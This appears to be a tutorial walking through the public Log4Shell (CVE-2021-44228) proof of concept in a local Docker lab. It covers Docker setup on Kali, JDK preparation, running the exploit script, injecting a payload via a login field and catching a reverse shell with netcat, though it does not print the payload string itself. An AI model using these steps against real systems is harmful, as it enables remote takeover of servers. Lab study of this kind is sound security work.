Apache Log4j Shell POC exploits

On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. The software library, Log4j, is built on a popular coding language, Java, that has widespread use in other software and applications used worldwide. This flaw in Log4j is estimated to be present in over 100 million instances globally.

The flaw, also known as a vulnerability by the security community, was rated a 10 out of 10 on the Common Vulnerability Scoring System, or CVSS, due to the potential impact that it can have if leveraged by attackers. Details of the vulnerability can be found in the National Vulnerability Database (NVD) under the heading CVE-2021–44228.

In this article, I’m using a vulnerable web app to demonstrate the POC of Apache log4j

Log4shell POC repository : https://github.com/kozmer/log4j-shell-poc

First to set up the vulnerable web app environment, we need to use docker

A docker setup manual for kali linux 2021.1 version :

Installing Docker on Kali Linux (updated for 2021.1)

Preparation

Before starting, ensure your Kali Linux is fully up to date.

Add Docker PGP key (saved to /usr/share/keyrings/):

curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-archive-keyring.gpg >/dev/null

Configure Docker APT repository (Kali is based on Debian testing, which will be called buster upon release, and Docker now has support for it):

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

Update APT:

sudo apt-get update

Install Docker

If you had older versions of Docker installed, uninstall them:

sudo apt-get remove -y docker docker-engine docker.io

Install Docker:

sudo apt-get install -y docker-ce

est:

sudo docker run hello-world

To allow your non-root user to use Docker, add the user to docker group:

sudo usermod -aG docker $USER

Setup the POC lab

git clone https://github.com/kozmer/log4j-shell-poc

1: docker build -t log4j-shell-poc .
2: docker run — network host log4j-shell-poc

docker run network hosts

Once it’s running, we can access it from localhost:8080

Now setup poc scripts

This poc python scripts will automate the attacking process

Requirements:

pip install -r requirements.txt

Usage

Start netcat listener for the reverse connection

Launch the exploit.
Note: For this to work, the extracted java archive has to be named: jdk1.8.0_20, and be in the same directory.

downlaod the jdk package

Java Archive Downloads - Java SE 8

Note: You do need to make an account to be able to download the package.

Once you have downloaded and extracted the archive, you can find java and a few related binaries in jdk1.8.0_20/bin.
Note: Please make sure to extract the jdk folder into this repository with the same name in order for it to work.

❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

rename it to jdk1.8.0_20 (no matter what version you downloaded, to match the poc)

Now launch the poc exploit

pasting the exploit payload to username , and enter a random password, hit login

we see immediately the exploit.class script is being sent to the server

Look at netcat listener , and we got the reverse shell!

It allows us to remote code execute on the server that can give an attacker full control of any impacted system.